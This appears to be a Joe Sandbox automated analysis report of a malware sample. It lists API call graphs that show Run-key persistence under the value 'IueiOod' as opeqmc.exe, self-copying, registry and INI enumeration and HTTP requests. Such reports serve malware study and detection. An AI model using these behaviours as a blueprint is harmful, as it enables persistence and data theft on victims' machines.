SysFreeString 6414->6418 6415->6413 6416 409025 SysFreeString 6416->6419 6417->6417 6417->6418 6418->6411 6419->6407 6419->6416 6420 4090c7 SysAllocString 6420->6421 6421->6414 6421->6420 6423 40a582 2 API calls 6422->6423 6424 4091cc 6423->6424 6425 4091d2 6424->6425 6534 409655 6424->6534 6425->6316 6433 408a1a 6428->6433 6429 408bc4 6430 408c1c GetTickCount 6429->6430 6432 408a1e 6429->6432 6430->6432 6431 408c0d VariantClear 6431->6432 6432->6324 6433->6429 6433->6431 6433->6432 6434 408b99 SysFreeString 6433->6434 6435 408bab VariantClear 6433->6435 6436 408b6b SysFreeString 6433->6436 6434->6433 6435->6429 6435->6433 6436->6433 6441 409217 6437->6441 6438 409295 SysAllocString 6438->6330 6441->6438 6538 408091 6441->6538 6443 409c54 SysAllocString 6442->6443 6444 402a27 SysAllocString SysFreeString 6442->6444 6443->6444 6444->6322 6446 408832 6445->6446 6447 40a469 14 API calls 6446->6447 6449 408857 6447->6449 6448 40885c 6448->6357 6449->6448 6450 40a345 22 API calls 6449->6450 6458 408883 6450->6458 6451 40888a 6453 40a65e Sleep 6451->6453 6452 4088eb 6454 409f2b 5 API calls 6452->6454 6453->6448 6455 4088f6 6454->6455 6456 4089fd 5 API calls 6455->6456 6457 408911 6456->6457 6457->6451 6466 40891f 6457->6466 6458->6451 6458->6452 6546 409301 6458->6546 6460 4089f0 SysFreeString 6462 40a65e Sleep 6462->6466 6463 40a469 14 API calls 6463->6466 6464 40a345 22 API calls 6464->6466 6465 409f2b 5 API calls 6465->6466 6466->6460 6466->6462 6466->6463 6466->6464 6466->6465 6467 409301 7 API calls 6466->6467 6468 4089cd SysFreeString SysFreeString 6467->6468 6468->6466 6470 40a469 14 API calls 6469->6470 6472 4086b1 6470->6472 6471 4086b6 6471->6357 6472->6471 6473 40a345 22 API calls 6472->6473 6474 4086de 6473->6474 6475 4086e5 6474->6475 6476 4086f8 6474->6476 6477 40a65e Sleep 6475->6477 6478 409f2b 5 API calls 6476->6478 6477->6471 6480 408703 6478->6480 6479 40874a CharLowerW SysFreeString 6484 40876c 6479->6484 6480->6479 6481 408811 6483 409f2b 5 API calls 6483->6484 6484->6481 6484->6483 6557 408cb7 6484->6557 6486 40a16f 6485->6486 6487 40a16a 6485->6487 6491 40a188 SysAllocString 6486->6491 6500 40a057 GetForegroundWindow CoCreateInstance SetForegroundWindow 6486->6500 6497 40a0b5 CoInitialize 6487->6497 6493 40a1b8 6491->6493 6492 40a224 6492->6381 6493->6492 6494 40a1ce FindWindowW 6493->6494 6495 40a1e8 GetWindowLongW SetWindowLongW SetWindowPos 6494->6495 6496 40a1de SetParent 6494->6496 6495->6492 6496->6495 6498 40a0cc GetModuleHandleW CreateWindowExW 6497->6498 6499 40a0fd 6498->6499 6499->6486 6501 40a093 6500->6501 6501->6491 6501->6492 6503 40a262 _memset 6502->6503 6504 40a2d6 6502->6504 6505 40a270 SysAllocString SysAllocString 6503->6505 6504->6387 6506 40a2b3 6505->6506 6507 40a2c3 SysFreeString SysFreeString 6506->6507 6516 409fb1 6506->6516 6507->6504 6509 40a2c2 6509->6507 6511 40a2f4 6510->6511 6515 40a2f0 6510->6515 6512 40a313 6511->6512 6513 40a2fe GetProcessHeap HeapFree 6511->6513 6514 409c99 11 API calls 6512->6514 6513->6512 6514->6515 6515->6385 6525 40d258 6516->6525 6518 409fbd GetTickCount 6524 409fd3 6518->6524 6519 409fde GetTickCount 6520 409fea Sleep 6519->6520 6522 40a030 6519->6522 6521 409ff2 PeekMessageW 6520->6521 6523 40a005 DispatchMessageW 6521->6523 6521->6524 6522->6509 6523->6521 6524->6519 6524->6522 6525->6518 6527 40a5a0 6526->6527 6528 40a5a4 6526->6528 6527->6405 6529 40a63f 6528->6529 6532 40a5ae 6528->6532 6530 40a63b 6529->6530 6531 40a64e SysAllocString 6529->6531 6530->6405 6531->6530 6532->6530 6533 40a632 SysFreeString 6532->6533 6533->6530 6536 40966d 6534->6536 6535 4091eb SysFreeString 6535->6425 6536->6535 6537 40c5d0 __VEC_memcpy 6536->6537 6537->6535 6540 40809e __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 6538->6540 6539 408212 6539->6441 6540->6539 6542 407f4f 6540->6542 6544 407f5c 6542->6544 6543 407f71 6543->6540 6544->6543 6545 4072ed 3 API calls 6544->6545 6545->6543 6547 409314 6546->6547 6548 40933b CharLowerW 6547->6548 6550 4088de SysFreeString SysFreeString 6547->6550 6553 409364 6547->6553 6549 409351 6548->6549 6551 409362 SysFreeString 6549->6551 6552 409359 SysFreeString 6549->6552 6550->6452 6551->6553 6552->6550 6553->6550 6554 4093ae SysAllocString SysAllocString 6553->6554 6555 4093d7 SysFreeString SysFreeString 6554->6555 6555->6550 6558 408cd2 6557->6558 6559 408cd6 6558->6559 6560 408e8f 6558->6560 6561 408f17 VariantClear 6558->6561 6563 408e6d SysFreeString 6558->6563 6564 408e76 VariantClear 6558->6564 6565 408e2c SysFreeString 6558->6565 6567 409581 6558->6567 6559->6484 6560->6559 6562 408ed5 SysAllocString 6560->6562 6561->6559 6562->6559 6563->6564 6564->6558 6564->6560 6565->6558 6568 409591 6567->6568 6569 409595 6568->6569 6570 409599 CharLowerW 6568->6570 6569->6558 6571 4095fb 6570->6571 6573 4095b3 6570->6573 6572 40960a SysFreeString 6571->6572 6572->6558 6573->6571 6573->6572 6574 4095d5 CharLowerW 6573->6574 6575 4095df 6574->6575 6576 409605 SysFreeString 6575->6576 6576->6572 6946 403e18 6947 40821c PathCombineW 6946->6947 6948 403e3d 6947->6948 6949 403e87 6948->6949 6950 403e4c 6948->6950 6951 403e8f 6948->6951 6953 408248 8 API calls 6950->6953 6952 40c519 4 API calls 6951->6952 6955 403e9c 6952->6955 6953->6949 6954 40c5b9 SysFreeString 6954->6955 6955->6949 6955->6954 6956 40c43d 4 API calls 6955->6956 6957 40c00b 3 API calls 6955->6957 6958 40be3a HeapFree 6955->6958 6956->6955 6957->6955 6958->6955 6959 409a99 6960 409aa6 6959->6960 6961 409723 __VEC_memcpy 6960->6961 6962 409ac4 6961->6962 6963 409b18 6962->6963 6964 409723 __VEC_memcpy 6962->6964 6965 409ae9 6964->6965 6965->6963 6966 409af2 SysAllocString SysAllocString 6965->6966 6966->6963 6967 409f99 Sleep 6968 409fa7 6967->6968 6577 402c62 6586 406c77 RegOpenKeyExW 6577->6586 6579 402c77 6580 406cb5 GetVersionExW 6579->6580 6581 402c7c 6580->6581 6582 40a8f9 34 API calls 6581->6582 6583 402c8f 6582->6583 6584 40267a 122 API calls 6583->6584 6585 402ca8 6584->6585 6587 406c9b 6586->6587 6588 406c9f 6586->6588 6587->6579 6591 4069c0 RegQueryValueExW RegCloseKey 6588->6591 6590 406cb0 6590->6579 6591->6590 6969 40d2a4 6970 40d2ac 6969->6970 6971 40d378 __except_handler3 6970->6971 6975 40d790 6970->6975 6974 40d2e5 __except_handler3 __except_handler4 _CallDestructExceptionObject 6974->6971 6981 40d110 RtlUnwind 6974->6981 6979 40d7e5 _ValidateScopeTableHandlers __except_handler4 __FindPESection 6975->6979 6980 40d7d1 _ValidateScopeTableHandlers __except_handler4 __FindPESection 6975->6980 6976 40d99d VirtualQuery 6977 40d9b2 6976->6977 6976->6980 6978 40d9cc GetVersionExA 6977->6978 6977->6980 6978->6980 6979->6976 6979->6980 6980->6974 6982 40d128 6981->6982 6982->6974 6592 4053ea HeapCreate 6593 405408 GetProcessHeap 6592->6593 6594 40541c 6592->6594 6593->6594 6611 403740 6594->6611 6612 40375a 6611->6612 6728 40848f RegOpenKeyExW 6612->6728 6615 4037a2 ExpandEnvironmentStringsW 6738 4034a8 6615->6738 6616 403846 6620 40be3a HeapFree 6616->6620 6617 40383c 6742 4033a0 6617->6742 6621 403844 6620->6621 6626 403c10 6621->6626 6622 4037f6 SHGetFolderPathW 6623 4037c3 6622->6623 6623->6622 6624 408248 8 API calls 6623->6624 6625 403837 6623->6625 6624->6623 6625->6616 6625->6617 6627 403c29 6626->6627 6628 40848f 7 API calls 6627->6628 6629 403c6d 6628->6629 6630 403c79 ExpandEnvironmentStringsW 6629->6630 6639 403ca9 6629->6639 6756 4039ea HeapAlloc 6630->6756 6632 403e00 6635 4033a0 HeapFree 6632->6635 6633 403e0a 6636 40be3a HeapFree 6633->6636 6637 403e08 6635->6637 6636->6637 6648 4040e7 6637->6648 6638 403d18 SHGetFolderPathW 6638->6639 6639->6638 6641 408248 8 API calls 6639->6641 6642 403d88 6639->6642 6645 403df7 6639->6645 6773 4039a3 6639->6773 6641->6639 6643 40848f 7 API calls 6642->6643 6642->6645 6644 403dc8 6643->6644 6644->6645 6646 403dd4 ExpandEnvironmentStringsW 6644->6646 6645->6632 6645->6633 6647 4039a3 8 API calls 6646->6647 6647->6645 6652 404100 6648->6652 6649 40412c SHGetFolderPathW 6649->6652 6650 408248 8 API calls 6650->6652 6651 40416d 6653 404172 6651->6653 6654 40417c 6651->6654 6652->6649 6652->6650 6652->6651 6655 4033a0 HeapFree 6653->6655 6656 40be3a HeapFree 6654->6656 6657 40417a 6655->6657 6656->6657 6658 4041e4 HeapAlloc 6657->6658 6659 404212 6658->6659 6670 404453 6658->6670 6660 4042a0 RegOpenKeyExW 6659->6660 6661 40440f RegEnumKeyExW 6659->6661 6662 40443d 6659->6662 6671 40848f 7 API calls 6659->6671 6672 40435e RegOpenKeyExW 6659->6672 6673 40845d 2 API calls 6659->6673 6674 40c3f9 wvnsprintfW 6659->6674 6675 40c00b 3 API calls 6659->6675 6660->6659 6661->6659 6663 404427 RegCloseKey 6661->6663 6664 40be3a HeapFree 6662->6664 6663->6659 6665 404445 6664->6665 6666 404455 6665->6666 6667 40444b 6665->6667 6669 40be3a HeapFree 6666->6669 6668 4033a0 HeapFree 6667->6668 6668->6670 6669->6670 6676 40451b 6670->6676 6671->6659 6672->6659 6673->6659 6674->6659 6675->6659 6777 40be9d 6676->6777 6678 404535 HeapAlloc 6679 404786 6678->6679 6691 404555 6678->6691 6680 404796 6679->6680 6681 40478c 6679->6681 6683 40be3a HeapFree 6680->6683 6682 4033a0 HeapFree 6681->6682 6684 404794 6682->6684 6683->6684 6696 404a92 6684->6696 6685 4045c5 RegOpenKeyExW 6686 4045e8 RegEnumKeyExW 6685->6686 6685->6691 6686->6691 6687 404780 6688 40be3a HeapFree 6687->6688 6688->6679 6689 40476a RegCloseKey 6689->6691 6690 40848f 7 API calls 6690->6691 6691->6685 6691->6687 6691->6689 6691->6690 6692 40473d RegEnumKeyExW 6691->6692 6694 40c3f9 wvnsprintfW 6691->6694 6695 40c00b 3 API calls 6691->6695 6778 40854c RegOpenKeyExW 6691->6778 6692->6691 6694->6691 6695->6691 6702 404aab 6696->6702 6697 404ad7 SHGetFolderPathW 6697->6702 6698 404b18 6700 404b27 6698->6700 6701 404b1d 6698->6701 6699 408248 8 API calls 6699->6702 6704 40be3a HeapFree 6700->6704 6703 4033a0 HeapFree 6701->6703 6702->6697 6702->6698 6702->6699 6705 404b25 6703->6705 6704->6705 6706 405136 6705->6706 6707 405150 6706->6707 6708 40848f 7 API calls 6707->6708 6709 4051e0 ExpandEnvironmentStringsW 6707->6709 6710 40520b 6707->6710 6708->6707 6711 404e7b 8 API calls 6709->6711 6712 405211 6710->6712 6713 40521b 6710->6713 6711->6707 6714 4033a0 HeapFree 6712->6714 6715 40be3a HeapFree 6713->6715 6716 405219 6714->6716 6715->6716 6717 405229 6716->6717 6718 405238 6717->6718 6719 407b4e 9 API calls 6718->6719 6720 4052e8 6719->6720 6721 406d14 2 API calls 6720->6721 6724 405361 Sleep 6720->6724 6727 405372 6720->6727 6721->6720 6722 40537c Sleep 6722->6727 6724->6720 6725 4053cb Sleep 6725->6727 6726 4053e0 6727->6722 6727->6725 6727->6726 6782 409df4 6727->6782 6729 4084af 6728->6729 6732 4084c5 6728->6732 6746 40845d RegQueryValueExW 6729->6746 6731 403796 6731->6615 6731->6623 6732->6731 6749 40bfd0 6732->6749 6734 408518 6735 40852e 6734->6735 6736 40851f ExpandEnvironmentStringsW 6734->6736 6737 408531 GetProcessHeap HeapFree 6735->6737 6736->6735 6736->6737 6737->6731 6739 4034bc 6738->6739 6740 408248 8 API calls 6739->6740 6741 40350a 6740->6741 6741->6623 6745 4033a4 6742->6745 6743 40be3a HeapFree 6744 4033d7 6743->6744 6744->6621 6745->6743 6747 408482 RegCloseKey 6746->6747 6748 40847f 6746->6748 6747->6732 6748->6747 6750 40bfd7 6749->6750 6751 40bfda 6749->6751 6750->6734 6752 40bff3 6751->6752 6755 40be27 HeapAlloc 6751->6755 6752->6734 6754 40bffa 6754->6734 6755->6754 6757 403bb9 PathRemoveFileSpecW 6756->6757 6758 403a1a GetPrivateProfileStringW 6756->6758 6757->6639 6759 403a36 6758->6759 6770 403baf 6758->6770 6761 403a48 HeapAlloc 6759->6761 6759->6770 6760 40be3a HeapFree 6760->6757 6762 403a64 6761->6762 6761->6770 6763 403ac8 StrStrIW 6762->6763 6768 403ba9 6762->6768 6771 40c3f9 wvnsprintfW 6762->6771 6772 40c00b 3 API calls 6762->6772 6763->6762 6764 403add StrStrIW 6763->6764 6764->6762 6765 403af2 GetPrivateProfileStringW 6764->6765 6765->6762 6766 403b09 GetPrivateProfileStringW 6765->6766 6766->6762 6767 403b26 GetPrivateProfileStringW 6766->6767 6767->6762 6769 40be3a HeapFree 6768->6769 6769->6770 6770->6760 6771->6762 6772->6762 6774 4039b7 6773->6774 6775 408248 8 API calls 6774->6775 6776 4039e5 6775->6776 6776->6639 6777->6678 6779 40856f 6778->6779 6781 408585 6778->6781 6780 40845d 2 API calls 6779->6780 6780->6781 6781->6691 6783 409e01 6782->6783 6795 40beea 6783->6795 6787 409eb1 HttpOpenRequestW 6788 409ead 6787->6788 6789 409ecf HttpSendRequestW 6787->6789 6788->6727 6790 40be3a HeapFree 6789->6790 6791 409eea 6790->6791 6791->6788 6792 409eef InternetReadFile 6791->6792 6792->6788 6793 409f0c 6792->6793 6803 40bf35 6793->6803 6796 40bef4 6795->6796 6807 40beb4 6796->6807 6799 409e3e InternetConnectW 6799->6787 6799->6788 6801 40bf1c 6801->6799 6802 40beb4 WideCharToMultiByte 6801->6802 6802->6799 6804 40bf3a 6803->6804 6805 40bf3f MultiByteToWideChar 6803->6805 6804->6805 6806 40bf58 6805->6806 6806->6788 6808 40bec3 WideCharToMultiByte 6807->6808 6809 40bebe 6807->6809 6810 40bedd 6808->6810 6809->6808 6810->6799 6811 40be27 HeapAlloc 6810->6811 6811->6801 6989 40d2ac 6990 40d2ca 6989->6990 6992 40d378 __except_handler3 6989->6992 6991 40d790 __except_handler3 2 API calls 6990->6991 6993 40d2e5 __except_handler3 __except_handler4 _CallDestructExceptionObject 6991->6993 6993->6992 6994 40d110 __except_handler3 RtlUnwind 6993->6994 6994->6993 6995 402cad 6996 406c77 3 API calls 6995->6996 6997 402cc3 6996->6997 6998 406cb5 GetVersionExW 6997->6998 6999 402cc8 6998->6999 7000 40a8f9 34 API calls 6999->7000 7001 402cdb 7000->7001 7002 40267a 122 API calls 7001->7002 7003 402d00 7002->7003 7004 409c6f SysFreeString 7003->7004 7005 402d08 7004->7005 7006 4032af ExitProcess 7011 402c32 7012 40267a 122 API calls 7011->7012 7013 402c56 7012->7013 7014 409c6f SysFreeString 7013->7014 7015 402c5e 7014->7015 6812 402df3 6813 406c77 3 API calls 6812->6813 6814 402e08 6813->6814 6815 406cb5 GetVersionExW 6814->6815 6816 402e0d 6815->6816 6817 40a8f9 34 API calls 6816->6817 6818 402e20 6817->6818 6819 40267a 122 API calls 6818->6819 6820 402e39 6819->6820 7016 4094b6 7017 4094c9 7016->7017 7018 4094cd 7017->7018 7019 4094f3 CharLowerW CharLowerW 7017->7019 7020 4094e3 SysFreeString 7017->7020 7022 409560 7019->7022 7024 409512 7019->7024 7021 40957e 7020->7021 7023 40956f SysFreeString SysFreeString 7022->7023 7023->7021 7024->7022 7024->7023 7025 40953a CharLowerW 7024->7025 7026 409544 7025->7026 7027 40956a SysFreeString 7026->7027 7027->7023 7028 402db7 7029 40267a 122 API calls 7028->7029 7030 402dd1 7029->7030 7031 40183a 7032 401854 7031->7032 7033 408091 3 API calls 7032->7033 7036 401958 7032->7036 7034 40194a 7033->7034 7035 408091 3 API calls 7034->7035 7035->7036 7039 402e3e 7049 402e4d 7039->7049 7040 40327c 7041 402eb7 GetModuleFileNameW 7042 402ed6 GetCurrentDirectoryW 7041->7042 7041->7049 7042->7049 7043 402f2a GetLastError 7044 40a786 35 API calls 7043->7044 7044->7049 7045 403251 GetLastError 7045->7049 7046 403237 GetLastError 7046->7049 7047 40a786 35 API calls 7047->7049 7048 407552 Sleep 7048->7049 7049->7040 7049->7041 7049->7043 7049->7045 7049->7046 7049->7047 7049->7048 7050 40253c 50 API calls 7049->7050 7050->7049 7062 403bbf 7063 40821c PathCombineW 7062->7063 7064 403bdf 7063->7064 7065 403bf9 7064->7065 7066 403bfe 7064->7066 7067 403bee 7064->7067 7069 4039ea 12 API calls 7066->7069 7068 4039a3 8 API calls 7067->7068 7068->7065 7069->7065

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                                                                                                                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 0040763F
                                                                                                                                                                                                                • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00407660
                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,?,00000000,?,00000000), ref: 0040767F
                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 00407691
                                                                                                                                                                                                                • ReadFile.KERNELBASE(?,?,00000040,?,00000000), ref: 004076A1
                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076AF
                                                                                                                                                                                                                • ReadFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 004076C5
                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076EF
                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 00407705
                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?), ref: 00407714
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00407719
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocateProcessSize
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2296163861-0
                                                                                                                                                                                                                • Opcode ID: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                                                                                                                                                                                                                • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 121 40abd9-40abf5 call 40ac20 124 40abf7-40ac0c FindFirstFileW 121->124 125 40ac1a 121->125 124->125 126 40ac0e-40ac18 FindClose 124->126 127 40ac1c-40ac1f 125->127 126->127
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,76230900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                                                                                                                                                                                                                  • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040AC0F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FindOpen$CloseFileFirst
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3155378417-0
                                                                                                                                                                                                                • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                                                                                                                                                                                                                • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                                                                                                                                                                                                                  • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710), ref: 0040B3F7
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                                                                                                                                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0040B44D
                                                                                                                                                                                                                  • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,76230900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                                                                                                                                                                                                                  • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000004), ref: 0040B48D
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000004), ref: 0040B49A
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000004), ref: 0040B500
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                                                                                                                                                                                                                • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                                                                                                                                                                                                                • API String ID: 3692109554-477663111
                                                                                                                                                                                                                • Opcode ID: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
                                                                                                                                                                                                                • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 73 40ac20-40ac48 RegOpenKeyExW 74 40ac60-40ac76 RegOpenKeyExW 73->74 75 40ac4a-40ac55 call 4069c0 73->75 77 40ac78-40ac7a 74->77 78 40ac7c-40ac87 call 4069c0 74->78 80 40ac5a-40ac5e 75->80 81 40ac8e-40ac92 77->81 82 40ac8c-40ac8d 78->82 80->74 80->81 82->81
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,76230900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                                                                                                                                                                                                                  • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,75B4E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                                                                                                                                                                                                                  • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Open$CloseQueryValue
                                                                                                                                                                                                                • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                • API String ID: 3546245721-4228964922
                                                                                                                                                                                                                • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                                                                                                                                                                                                                • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
